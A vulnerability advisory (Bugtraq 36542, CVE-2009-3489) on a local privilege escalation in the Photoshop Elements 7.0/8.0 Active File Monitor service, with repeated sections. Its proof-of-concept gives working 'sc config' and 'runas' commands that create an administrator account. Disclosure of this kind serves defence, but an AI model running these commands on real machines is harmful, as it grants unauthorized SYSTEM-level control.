Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability
BID:36542
Info
Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability
| Bugtraq ID: | 36542 |
| Class: | Access Validation Error |
| CVE: |
CVE-2009-3489 |
| Remote: | No |
| Local: | Yes |
| Published: | Sep 29 2009 12:00AM |
| Updated: | Nov 12 2009 07:16PM |
| Credit: | Nine:Situations:Group::bellick |
| Vulnerable: |
Adobe Photoshop Elements 8.0 Adobe Photoshop Elements 7.0 |
| Not Vulnerable: | |
Discussion
Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability
Adobe Photoshop Elements is prone to a local privilege-escalation vulnerability because the application has insufficient protections in a security descriptor.
Attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will completely compromise an affected computer.
Photoshop Elements versions 7.0 and 8.0 are vulnerable.
Adobe Photoshop Elements is prone to a local privilege-escalation vulnerability because the application has insufficient protections in a security descriptor.
Attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will completely compromise an affected computer.
Photoshop Elements versions 7.0 and 8.0 are vulnerable.
Exploit / POC
Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability
To exploit this issue, attackers require local, interactive access to an affected computer.
The following example commands are available:
sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd
To exploit this issue, attackers require local, interactive access to an affected computer.
The following example commands are available:
sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd
Solution / Fix
Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability
References:
References:
- Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor (Nine:Situations:Group::bellick)
- Photoshop Elements Homepage (Adobe)
- Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor ([email protected])
- Workaround available for potential Photoshop Elements privilege escalation issue (Adobe)